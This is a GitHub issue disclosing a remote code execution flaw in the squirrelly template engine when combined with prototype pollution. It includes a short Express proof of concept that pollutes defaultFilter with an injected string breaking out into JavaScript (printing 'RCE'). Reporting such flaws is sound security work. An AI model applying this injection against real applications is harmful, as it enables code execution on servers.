search

squirrellyjs / squirrelly

Semi-embedded JS template engine that supports helpers, filters, partials, and template inheritance. 4KB minzipped, written in TypeScript ⛺
https://squirrelly.js.org
MIT License
555 stars 81 forks source link

RCE when combined with Prototype Pollution #233

Open sayoojbkumar opened 2 years ago

sayoojbkumar commented 2 years ago

RCE when combined with Prototype Pollution squirrelly-js vulnerable to RCE when Prototype Pollution exists. A attacker can have control over defaultFilter which leads to RCE

To Reproduce

test.js

const express = require('express')
var sqrl = require('squirrelly')
const app = express()
const port = 8000

constructor.prototype.defaultFilter="e')); console.log('RCE') //";//prototype pollution

app.set('views', __dirname);
app.set('view engine', 'squirrelly')
app.get('/', (req, res) => {
   res.render('index.squirrelly', {'testValue':'test'})
})

app.listen(port, () => {})
module.exports = app;

index.squirrelly

<html>
<html>
    <head>
        <title>RCE via pp</title>
    </head>
<body>
    <p>{{it.testValue}}</p>
</body>
</html>

Screenshots Screenshot from 2021-08-15 16-48-46

Package & Environment Details